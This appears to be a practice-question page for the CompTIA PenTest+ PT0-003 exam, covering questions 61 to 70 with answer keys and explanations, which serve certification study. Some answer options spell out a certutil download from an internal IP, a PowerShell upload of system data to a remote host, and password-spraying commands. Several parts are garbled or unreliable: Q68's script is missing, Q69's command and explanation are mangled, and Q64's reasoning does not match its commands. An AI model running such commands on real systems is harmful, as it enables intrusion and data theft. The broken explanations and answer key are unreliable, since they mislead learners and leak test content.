CompTIA PT0-003 Online Practice Questions and Exam Preparation

CompTIA PT0-003 Online Questions & Answers

• Question 61:

  A penetration tester identified numerous flaws that could lead to unauthorized modification of critical data.

  Which of the following would be best for the penetration tester to recommend?

  A. Flat access
  B. Role-based access control
  C. Permission-based access control
  D. Group-based control model
  B. Role-based access control

  ---

  Explanation

  RBAC is best for preventing unauthorized modification by assigning permissions to roles rather than individuals, ensuring that only authorized users can access critical data based on their role within the organization.

• Question 62:

  A penetration tester is searching for vulnerabilities or misconfigurations on a container environment.

  Which of the following tools will the tester most likely use to achieve this objective?

  A. Nikto
  B. Trivy
  C. Nessus
  D. Nmap
  B. Trivy

  ---

  Explanation

  Containers (e.g., Docker, Kubernetes) require specialized scanning tools to detect vulnerabilities.

  Trivy (Option B):

  Trivy is an open-source vulnerability scanner designed specifically for containers and Kubernetes environments.

  It scans container images, repositories, and running containers for known vulnerabilities (CVEs).

  References:

  CompTIA PenTest+ PT0-003 Official Study Guide - "Container Security and Vulnerability Scanning"

  Incorrect options:

  Option A (Nikto): Web server scanner, not container-focused.

  Option C (Nessus): General network vulnerability scanner, but lacks container-specific scanning.

  Option D (Nmap): Network mapper, not a vulnerability scanner.

• Question 63:

  A penetration tester is compiling the final report for a recently completed engagement. A junior QA team member wants to know where they can find details on the impact, overall security findings, and high-level statements.

  Which of the following sections of the report would most likely contain this information?

  A. Quality control
  B. Methodology
  C. Executive summary
  D. Risk scoring
  C. Executive summary

  ---

  Explanation

  In the final report for a penetration test engagement, the section that most likely contains details on the impact, overall security findings, and high-level statements is the executive summary. Here's why:

  Purpose of the Executive Summary:

  It provides a high-level overview of the penetration test findings, including the most critical issues, their impact on the organization, and general recommendations.

  It is intended for executive management and other non-technical stakeholders who need to understand the security posture without delving into technical details.

  Contents of the Executive Summary:

  Impact: Discusses the potential business impact of the findings.

  Overall Security Findings: Summarizes the key vulnerabilities identified during the engagement.

  High-Level Statements: Provides strategic recommendations and a general assessment of the security posture.

  Comparison to Other Sections:

  Quality Control: Focuses on the measures taken to ensure the accuracy and quality of the testing process.

  Methodology: Details the approach and techniques used during the penetration test.

  Risk Scoring: Provides detailed risk assessments and scoring for specific vulnerabilities but does not offer a high-level overview suitable for executives.

• Question 64:

  A penetration tester is preparing a password-spraying attack against a known list of users for the company "example". The tester is using the following list of commands:

  pw-inspector -i sailwords -t 8 -S pass

  spray365.py spray -ep plan

  users="~/user.txt"; allwords="~/words.txt"; pass="~/passwords.txt"; plan="~/spray.plan" spray365.py generate --password-file $pass --userfile $user --domain "example.com" --execution-plan

  $plan

  cew -m 5 "http://www.example.com" -w sailwords

  Which of the following is the correct order for the list of the commands?

  A. 3, 4, 1, 2, 5
  B. 3, 1, 2, 5, 4
  C. 2, 3, 1, 4, 5
  D. 3, 5, 1, 4, 2
  A. 3, 4, 1, 2, 5

  ---

  Explanation

  Let's break it down in order:

  Step 3: Sets environment variables (paths to user list, password list, etc.).

  Step 4: Generates the execution plan using spray365.py generate with the variables set in step 3.

  Step 1: Filters the password list using pw-inspector to enforce a minimum password policy.

  Step 2: Executes the password spraying using the generated plan.

  Step 5: Optionally verifies availability or reachability using cew (custom enumeration wrapper).

  The correct logical order of operations matches

  Option A:

  References:

  PT0-003 Objective 2.3: Perform password attacks.

  Kali tools & scripts usage and scripting logic are core elements in PenTest+ methodology.

• Question 65:

  User credentials were captured from a database during an assessment and cracked using rainbow tables.

  Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database?

  A. MD5
  B. bcrypt
  C. SHA-1
  D. PBKDF2
  A. MD5

  ---

  Explanation

  References:

  https://www.geeksforgeeks.org/understanding-rainbow-table-attack/

• Question 66:

  Which of the following is within the scope of proper handling and most crucial when working on a penetration testing report?

  A. Keeping both video and audio of everything that is done
  B. Keeping the report to a maximum of 5 to 10 pages in length
  C. Basing the recommendation on the risk score in the report
  D. Making the report clear for all objectives with a precise executive summary
  D. Making the report clear for all objectives with a precise executive summary

  ---

  Explanation

  A well-structured penetration testing report should be clear, objective-driven, and include an executive summary to communicate findings effectively to both technical teams and executives.

  Option A (Keeping video/audio of everything): Not required. Video/audio documentation is rarely used in penetration testing reports.

  Option B (Keeping reports 5-10 pages): Reports vary in length based on scope and complexity. There is no strict page limit.

  Option C (Basing recommendations on risk score): Risk scores are important, but the report should also provide remediation guidance, exploitability context, and business impact.

  Option D (Clear objectives & executive summary): Correct.

  The executive summary helps non-technical stakeholders understand risks and priorities.

  The report should be detailed yet clear, focusing on findings, impact, and remediation.

  References:

  CompTIA PenTest+ PT0-003 Official Guide ?Penetration Testing Reports&

  Communication

• Question 67:

  A penetration tester performs a Man-in-the-Middle attack on an internal network and receives NTLMv2 hashes from multiple hosts.

  Which tool should the tester use NEXT to attempt offline password cracking?

  A. John the Ripper
  B. sqlmap
  C. Nikto
  D. BloodHound
  A. John the Ripper

  ---

  Explanation

  John the Ripper (or Hashcat) is used for offline cracking of NTLMv2 challenge-response hashes. After capturing hashes using tools like Responder, cracking them offline is a typical next step.

  Why not others:

  Option B - sqlmap is for SQL injection testing.

  Option C - Nikto performs web-server vulnerability scans.

  Option D - BloodHound maps AD attack paths, not hash cracking.

  PT0-003 Mapping: Domain 3 - Credential attacks and offline cracking.

• Question 68:

  A penetration tester is trying to execute a post-exploitation activity and creates the follow script:

  

  Which of the following best describes the tester's objective?

  A. To download data from an API endpoint
  B. To download data from a cloud storage
  C. To exfiltrate data over alternate data streams
  D. To exfiltrate data to cloud storage
  D. To exfiltrate data to cloud storage

  ---

  Explanation

  The script shows:

  Use of BlobServiceClient.from_connection_string() -- this is Azure Blob Storage interaction.

  It opens a local file in binary mode (with open(file_path, "rb")).

  Calls blob_client.upload_blob(data) -- clearly indicating uploading the local file to cloud storage.

  This matches data exfiltration activity, where stolen or sensitive local files are sent to an external system (cloud storage).

  Why not the others?

  Option A: API endpoint: The code uses Azure Blob storage SDK, not a REST API endpoint.

  Option B: Download data from cloud storage: Code uploads, not downloads.

  Option C: Alternate data streams (ADS): That's a Windows NTFS feature, unrelated to cloud storage.

  CompTIA PT0-003 Objective Mapping:

  Domain 3.0 Attacks and Exploits 3.2: Post-exploitation techniques (data exfiltration, cloud storage use).

• Question 69:

  A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions.

  Which of the following commands would help the tester START this process?

  A. certutil rlcache plit http://192.168.2.124/windows-binaries/accesschk64.exe
  B. powershell (New-Object System.Net.WebClient).UploadFile(`http://192.168.2.124/upload.php', `systeminfo.txt')
  C. schtasks /query /fo LIST /v | find /I "Next Run Time:"
  D. wget http://192.168.2.124/windows-binaries/accesschk64.exeaccesschk64.exe
  A. certutil rlcache plit http://192.168.2.124/windows-binaries/accesschk64.exe

  ---

  Explanation

  https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/

  ---

  https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk

  The certutil command is a Windows utility that can be used to manipulate certificates and certificate authorities. However, it can also be abused by attackers to download files from remote servers using the - urlcache option. In this case, the command downloads accesschk64.exe from

  http://192.168.2.124/windows-binaries/andsavesitlocally.Accesschk64.exeisatoolthatcanbeusedtocheckservicepermissionsandidentifypotentialprivilegeescalationvectors.Theothercommandsarenotrelevantforthispurpose.Powershellisascriptinglanguagethatcanbeusedtoperformvarioustasks,butinthiscaseituploadsafileinsteadofdownloadingone.Schtasksisacommandthatcanbeusedtocreateorqueryscheduledtasks,butitdoesnothelpwithservicepermissions.WgetisaLinuxcommandthatcanbeusedtodownloadfilesfromtheweb,butitdoesnotworkonWindowsbydefault.

• Question 70:

  A penetration tester completed OSINT work and needs to identify all subdomains for mydomain.com.

  Which of the following is the best command for the tester to use?

  A. nslookup mydomain.com ?/path/to/results.txt
  B. crunch 1 2 | xargs -n 1 -I 'X' nslookup X.mydomain.com
  C. dig @8.8.8.8 mydomain.com ANY ?/path/to/results.txt
  D. cat wordlist.txt | xargs -n 1 -I 'X' dig X.mydomain.com
  D. cat wordlist.txt | xargs -n 1 -I 'X' dig X.mydomain.com

  ---

  Explanation

  Using dig with a wordlist to identify subdomains is an effective method for subdomain enumeration. The command cat wordlist.txt | xargs -n 1 -I 'X' dig X.mydomain.com reads each line from wordlist.txt and performs a DNS lookup for each potential subdomain.

  Command Breakdown:

  cat wordlist.txt: Reads the contents of wordlist.txt, which contains a list of potential subdomains.

  xargs -n 1 -I 'X': Takes each line from wordlist.txt and passes it to dig one at a time.

  dig X.mydomain.com: Performs a DNS lookup for each subdomain.

  Why This is the Best Choice:

  Efficiency: xargs efficiently processes each line from the wordlist and passes it to dig for DNS resolution.

  Automation: Automates the enumeration of subdomains, making it a practical choice for large lists.

  Benefits:

  Automates the process of subdomain enumeration using a wordlist.

  Efficiently handles a large number of subdomains.

  References from Pentesting Literature:

  Subdomain enumeration is a critical part of the reconnaissance phase in penetration testing. Tools like dig and techniques involving wordlists are commonly discussed in penetration testing guides. HTB write-ups often detail the use of similar commands for efficient subdomain enumeration.

  References:

  Penetration Testing - A Hands-on Introduction to Hacking

  HTB Official Writeups